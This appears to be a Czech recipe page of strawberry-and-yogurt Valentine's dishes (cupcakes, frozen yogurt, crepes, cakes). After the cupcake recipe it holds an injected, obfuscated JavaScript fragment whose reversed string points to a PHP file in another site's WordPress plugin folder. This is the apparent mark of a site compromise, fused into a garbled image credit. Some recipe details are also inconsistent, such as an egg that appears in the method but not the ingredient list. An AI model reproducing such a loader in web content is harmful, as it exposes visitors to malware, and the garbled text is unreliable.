FACESTARReceptyJAHODY A JOGURT: JEMNÉ VALENTÝNSKÉ POTĚŠENÍ PRO CHUŤOVÉ BUŇKY VAŠEHO PARTNERA!

JAHODY A JOGURT: JEMNÉ VALENTÝNSKÉ POTĚŠENÍ PRO CHUŤOVÉ BUŇKY VAŠEHO PARTNERA!

Jahodové cupcakes s jogurtem

Jahodové cupcakes s jogurtem

Ingredience:

1 šálek hladké mouky
2 lžičky prášku do pečiva
1/4 lžičky soli
1/4 šálku másla o pokojové teplotě
1/2 šálku cukru
1 lžička vanilkového extraktu nebo vanilkový cukr místo části běžného cukru
10 kapek červeného potravinářského barviva
1/2 šálku jahodového jogurtu
8 malých čtverečků hořké čokolády
Červené cukrářské sypání

Krém:

1/3 šálku másla
3 až 4 šálky moučkového cukru
1 lžička vanilkového extraktu nebo vanilkový cukr místo části moučkového
2 lžíce jahodového džemu
2 lžíce mléka

Postup přípravy:

Troubu předehřejeme na 170 °C. Do formy na muffiny vložíme 12 papírových košíčků. V misce promícháme mouku s práškem do pečiva a solí. V jiné misce vyšleháme máslo s cukrem do pěny, přidáme vejce, vanilku a červené barvivo. Do směsi pomalu vmícháme suché přísady, potom jogurt a nakonec zbývající suché přísady. Dobře promícháme.

Těsto rozdělíme do košíčků a pečeme 17 až 20 minut, propečenost zkoušíme špejlí. Po vyjmutí z trouby necháme vychladnout. Mezi tím rozehřejeme ve vodní lázni čokoládu a vlijeme ji do připraveného cukrářského sáčku nebo zdobičky. Zdobičkou vytvoříme na pečicím papíru srdíčka a posypeme je červeným sypáním.

Máslo našleháme vidličkou nebo elektrickým šlehačem a přidáme postupně moučkový cukr, vanilku a jahodový džem. Přidáme mléko a vyšleháme do pěny. Krém naneseme cukrářským sáčkem na cupcakes a ozdobíme čokoládovými srdíčky.

and$nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahanditob_DSC0477″>flickr.com/banditob_DSC0477

Jahodová zmrzlina z jogurtu

Ingredience:

500 g mražených jahod
1 šálek řeckého jogurtu
1/4 šálku cukru nebo jiného sladidla
1/3 šálku pokrájených čerstvých jahod
1 lžíce citronové šťávy

Postup přípravy:

Všechny přísady kromě čerstvých jahod vložíme do mixéru a rozmixujeme. Čerstvé jahody můžeme zamíchat do zmrzliny nebo jimi zmrzlinu ozdobit. Tužší zmrzlinu získáme, když směs vložíme na několik hodin do mrazáku.

andflickr.com/Deeba Rajpal

Mražené jahody v jogurtu

Ingredience:

Čerstvé jahody a vanilkový jogurt podle množství jahod

Postup přípravy:

Jahody omyjeme, větší jahody nakrájíme na poloviny nebo na čtvrtiny a jogurt vlijeme do misky. Plech vyložíme pečicím papírem. Jahody napichujeme párátkem a namáčíme do jogurtu. Pak je položíme na plech a vložíme do mrazáku, kde je necháme alespoň 2 až 3 hodiny.

andsurfersnacks.wordpress.com

Palačinky s jahodami a šlehačkou

Ingredience:

Na palačinky

2 rozšlehaná vejce
1 šálek mléka
4 lžíce rozpuštěného másla
1 šálek hladké mouky
Špetka soli
1 lžíce cukru

Na náplň

600 g jahod
1 lžíce cukru na šlehačku
1 lžíce cukru na jahody
1 lžíce pomerančového likéru
1 šálek smetany ke šlehání

Postup přípravy:

Smetanu vyšleháme s cukrem a dáme do ledničky. Jahody, cukr a pomerančový likér vložíme do misky, promícháme a postavíme stranou.

Vejce rozšleháme s mlékem a 2 lžícemi rozpuštěného másla. V jiné misce smícháme mouku se solí a zbylým cukrem. Suché přísady pomalu přisypeme do mléka s vejcem a rozmícháme, aby v něm nebyly hrudky. Palačinky smažíme na malém množství másla.

andflickr.com/Dat 2014 Strawberry Crepe

Jahodový nápoj lásky

Ingredience:

1 Kefírové mléko nízkotučné jahodové
0,5 dkg jahod
1 lžička medu

Postup přípravy:

Jahody očistíme a pečlivě omyjeme. Do mixéru nalijeme kefír, přidáme jahody a lžičku medu pro dochucení. Vše rozmixujeme a slijeme do nachlazené sklenice. Okraj skleničky můžeme navíc ozdobit jahodou.

and

Smetanový dort pro zamilované

Ingredience:

3 balíčky vanilkového cukru
Jahody
0,5 litru Kysané smetany z Valašska 15 %
1 balíček piškotů

Postup přípravy:

V míse smícháme vanilkový cukr s kysanou smetanou. Libovolnou pečící formu vyložíme igelitem a začneme do ní postupně vrstvit piškoty a ovoce. Na ně postupně naléváme smetanu. Zbytek piškotů položíme na povrch hmoty. Výslednou směs necháme přes noc v lednici ztuhnout.

and

Jogurtový koláč

Ingredience:

200 g polohrubé mouky
4 bílé Smetanové jogurty z Valašska
2 vejce
1 kypřící prášek
1 vanilkový cukr
100 g krupicového cukru
Jahody

Postup přípravy:

V míse smícháme všechny ingredience. Výslednou směs opatrně vlijeme a rozetřeme po celé délce vymazaného a vysypaného menšího plechu. Navrch pokládáme jahody, které do těsta mírně zatlačíme.

Plech vložíme do předehřáté trouby na 160°C a pečeme půl hodiny.

Koláč servírujeme posypaný moučkovým cukrem.

Související články